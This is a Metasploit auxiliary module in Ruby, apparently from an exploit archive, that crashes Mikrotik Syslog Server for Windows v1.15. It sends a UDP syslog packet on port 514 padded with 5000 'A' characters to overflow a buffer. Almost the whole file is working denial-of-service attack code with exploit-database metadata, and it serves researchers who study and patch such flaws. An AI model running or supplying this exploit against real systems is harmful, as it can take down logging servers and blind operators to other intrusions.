|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43  |  # Exploit Title: Mikrotik Syslog Server for Windows - remote BOF DOS  # Date: 19.04.2013 # Exploit Author: xis_one@STM Solutions  # Vendor Homepage:www.mikrotik.com # Software Link: http://www.mikrotik.com/download/MT_Syslog.exe # Version: 1.15 (most recent version 19.04.2013)  # Tested on: Windows XP SP3, Windows 7 SP1  require 'msf/core' class Metasploit3 < Msf::Auxiliary  include Msf::Exploit::Remote::Udp  include Msf::Auxiliary::Dos  def initialize  super(  'Name'=> 'Mikrotik Syslog Server for Windows - remote BOF DOS',  'Description' => %q{  This module triggers the windows socket error WSAEMSGSIZE (message to long) in the Mikrotik Syslog Server for Windows v 1.15 and crashes it. The long syslog message overwrite the allocated buffer space causing the socket error.  },  'Author'=> 'xis_one@STM Solutions',  'License' => MSF_LICENSE,  'DisclosureDate' => 'Apr 19 2013')  register_options(  [  Opt::RPORT(514)  ])  end  def run  connect_udp  pkt = "<0>" + "Apr19 " +"10.0.0.2 " + "badass" + ": " + "A"*5000  print_status("Crashing the remote Mikrotik syslog server #{rhost}")  udp_sock.put(pkt)  disconnect_udp  end end  |